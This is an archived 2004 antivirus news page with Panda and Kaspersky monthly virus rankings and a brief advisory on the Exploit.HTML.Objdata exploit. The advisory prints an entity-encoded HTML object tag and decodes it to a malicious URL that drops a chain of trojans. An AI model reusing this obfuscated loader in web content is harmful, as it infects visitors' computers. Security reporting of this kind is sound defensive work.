Antivirus World - News, removal tools, how to delete viruses, trojans, worms

- Bookmark AntivirusWorld.com - Make AntivirusWorld your Start Page -

AntivirusWorld recommends:
Buy EZ Antivirus - automatic defense against the viruses

Home

Antiviruses

Articles

Anti-spam

Forum

Test

Buy


	News archive about antivirus software, virus threats, trojans

November 2004

Top Ten viruses most frequently detected by Panda ActiveScan in October -- Posted by Igor_Donchenko on Tuesday, November 2 2004
No unusual virus activity was registered in October. The new viruses detected during this period did not cause any significant incidents. This is reflected in the October edition of the Top Ten viruses. According to data gathered by Panda Software’s free, online scanner, ActiveScan, Downloader.GK was –for the fifth month running - the most frequently detected malicious code.

Downloader.GK is programmed to install spyware and adware on affected computers, and caused over 23 percent of attacks registered last month. Second place is taken by Mhtredir.gen, a generic detection for a large group of Trojans that allow code to be run remotely on the affected computer, without the user’s permission.

The Mabutu.A worm, which came in eighth in the September edition of the Top Ten, climbed up to third place in October. Even though it is an email worm, Mabutu.A also acts as a backdoor Trojan, making it particularly dangerous. Netsky.P, a worm that has appeared in the Top Ten ranking of the most frequently detected viruses over the last few months, ranked fourth in the latest edition. This could be because it exploits a vulnerability in the browser Microsoft Internet Explorer to run automatically.

The generic detections for the Gaobot (Gaobot.gen) family of worms and for the script created by the infamous Sasser worms to download themselves to computers via FTP (Sasser.ftp), came in fifth and sixth. Seventh place was occupied by StartPage.FH, another Trojan designed to install malware on affected computers.

The bottom part of the Top Ten includes Qhost.gen, a generic detection for the modifications made to the HOSTS file by various Trojans; Downloader.OU, another member of this group of malicious code and Sdbot.gen, a generic detection for the Sdbot family of worms.

Virus Name Percentage
Trj/Downloader.GK 23,15%
Mhtredir.gen 5,77%
W32/Mabutu.A.worm 5,62%
W32/Netsky.P.worm 5,33%
W32/Gaobot.gen.worm 4,67%
W32/Sasser.ftp 4,56%
Trj/StartPage.FH 3,51%
Trj/Qhost.gen 2,48%
Trj/Downloader.OU 2,19%
W32/Sdbot.gen.worm 2,08%

The following conclusions can be drawn from the data collected by Panda ActiveScan in October:

- The number of incidents caused by computer worms has increased. Unlike previous months, in which the number of Trojans detected was higher than the number of worms, last month a similar number of these different types of malicious code was detected. However, bear in mind that all the worms on this list have Trojan functions. This confirms that there is a large amount of criminal activity in the Internet, as Trojans are often used by cyber criminals to commit fraud, above all, financial fraud.

- Financial gain: the main motivation for creating malware. Several of the Trojans in the October Top Ten are designed to install other malware, like spyware or adware, on affected computers. This once again demonstrates that it is activity with financial gain that is motivating the creators of Internet threats, selling data on users’ browsing habits, for example, can earn substantial profits.

- Many users are not correctly applying the patches to fix vulnerabilities in the software installed. The presence of Netsky.P, which exploits a known vulnerability that was fixed three month ago, is proof of this. Similarly, the Sasser worms are still around, which also exploit a security flaw in Windows to infect computers directly via the Internet.

Source: http://www.pandasoftware.com

The Virus Top Twenty for October 2004 from Kaspersky Labs -- Posted by Igor_Donchenko on Tuesday, November 2 2004

Ranking Change Virus Name Percentage
1 - I-Worm.Netsky.q 15.95%
2 -1 I-Worm.Netsky.aa 14.45%
3 +1 I-Worm.Netsky.b 10.52%
4 +8 I-Worm.Bagle.as 7.43%
5 +1 I-Worm.Bagle.z 6.59%
6 -1 I-Worm.Mydoom.m 5.90%
7 new I-Worm.Bagle.at 4.01%
8 -5 I-Worm.Zafi.b 3.03%
9 - I-Worm.Netsky.t 2.90%
10 -3 I-Worm.Netsky.d 2.83%
11 -1 I-Worm.Netsky.y 2.31%
12 -1 I-worm.LovGate.w 2.30%
13 - I-Worm.Mydoom.l 1.82%
14 new I-Worm.Mydoom.ab 1.75%
15 -1 I-Worm.NetSky.r 1.39%
16 - I-Worm.Bagle.gen 1.37%
17 re-entry I-Worm.Mydoom.r 1.31%
18 -1 I-Worm.NetSky.c 0.95%
19 - I-Worm.Bagle.ah 0.87%
20 re-entry Backdoor.Win32.Rbot.gen 0.51%
Other malicious programs (not in the Top 20) 12%

October, like September, saw further new variants of Mydoom and Bagle. Mydoom.ab (Swash.a) and Bagle.at appeared within a few days of each other. In fact, Bagle.at was followed immediately by a clone: Bagle.au, thought the clone did not make the Top Twenty. The Bagle mass mailing, October 29, was so effective that it took Bagle.at only 3 days to reach seventh place in the Top Twenty.

On the other hand, the high ranking was achieved in the first day: the numbers have fallen in the past two days and Bagle.at may well not rank so high in November. A new version of the Hungarian I-Worm.Zafi.c was detected in the interim between Mydoom.ab and Bagle.at. This third variant has not been seen in the wild yet, though an outbreak is highly probable if we remember how long the previous variant was in the Top Twenty.

In all other respects, the October Top Twenty is almost identical to the September Top Twenty. NetSky variants are on top, with Bagle and Mydoom variants continuing their fruitless efforts to outrank them. Bagle.as has moved noticeably: 8 slots in one month. Zafi.b continues falling - 5 places and a high probability of leaving the Top Twenty by November. If this occurs, LovGate.w will be the only malicious program on the list that is no a member of the Big Three.

TrojanDownloader.JS.Gen and TrojanDropper.VBS.Zerolin have already left the rankings, despite a number of mass mailings containing these programs. However, other malicious programs proved more active and pushed these Trojans out of the Top Twenty.

However, other malicious programs continue to challenge the Big Three - Backdoor.Win32.Rbot.gen returned to the ratings this month. This backdoor, a hard-hitting bot, is controlled via IRC channels: it normally spreads by exploiting various vulnerabilities in Windows (RPC DCOM, LSASS and so forth). This month, virus writers seem to have decided that SP2 for Windows XP created too many barriers: they chose to send Rbot via email instead, and successfully as statistics demonstrated.

Sadly, we cannot look forward to life without Bagle and Mydoom yet. The source codes of both worms have been widely publicized on the Internet and spread by the worms themselves. Most of the virus activity we have witnessed recently has been caused by variants of these two worms, or, to be precise, recompiled versions of the published source code.

Other malware made up a significant proportion of Internet traffic this month: we detected over 200 different malicious programs.

Summary:

New viruses: Bagle.at, Mydoom.ab
Moved up: NetSky.b, Bagle.as, Bagle.z
Moved down: Mydoom.m, Zafi.b, NetSky.d, NetSky.y, LovGate.w, NetSky.r, NetSky.c
No change: NetSky.q, NetSky.aa, NetSky.t, Mydoom.l, Bagle.gen, Bagle.ah
Re-entry: Mydoom.r, Rbot.gen

Source: http://www.kaspersky.com

Exploit.HTML.Objdata -- Posted by Igor_Donchenko on Monday, November 1 2004
Exploit.HTML.Objdata (Kaspersky Lab) is also known as: Exploit-ObjectData (McAfee), Trojan Horse (Symantec), Exploit:HTML/Objectdata* (RAV), HTML_OBJECTEXP.A (Trend Micro), PMS/Exploit.ObjData (H+BEDV), VBS:Malware (ALWIL), HTML.Daemonize.Loader.A (SOFTWIN)

Behavior: Exploit

Technical Details: ObjData is an exploit often seen in spam mailings.

ObjData attempts to use the Object Type Vulnerability and Two vulnerabilities that could allow an attacker to cause arbitrary code to run on the user's system in MS Windows described in the following Security Bulletins:

Microsoft Security Bulletin MS03-032
Microsoft Security Bulletin MS03-040

These vulnerabilities are critical since they allow for the execution of random malicious code when users visit specially constructed HTML pages.

A sample of code from the end of the file:

<objectdata="&#104;&#116;&#116;&#112;&#58;&#47;
&#47;&#119;&#119;&#119;&#46;&#102;&#97;&#116;
&#98;&#111;&#110;&#117;&#115;&#99;&#97;&#115;
&#105;&#110;&#111;&#46;&#99;&#111;&#109;&#47;
&#112;&#97;&#103;&#101;&#46;&#112;&#104;&#112;">

Decryption of above:
http://www.fatbonuscasino.com/page.php

Once users connect to this site a chain of Trojans hits:

Trojandropper.VBS.Zerolin which extracts TrojanDropper.Win32.Small.ei from itself and executes it.
Small.ei in turn extracts two more Trojans from itself: TrojanNotifier.Win32.Small.d and TrojanProxy.Win32.Daemonize.j.

Source: http://www.viruslist.com

AntivirusWorld recommends:

Buy EZ Antivirus - automatic defense against the viruses

eTrust EZ Antivirus detects and removes 100% of computer viruses "in the wild" - keeping you safe from virtually all known virus threats. Plus, with automatic software updates, new threats that emerge daily won't stand a chance.


	News archive

Virus and security arcticles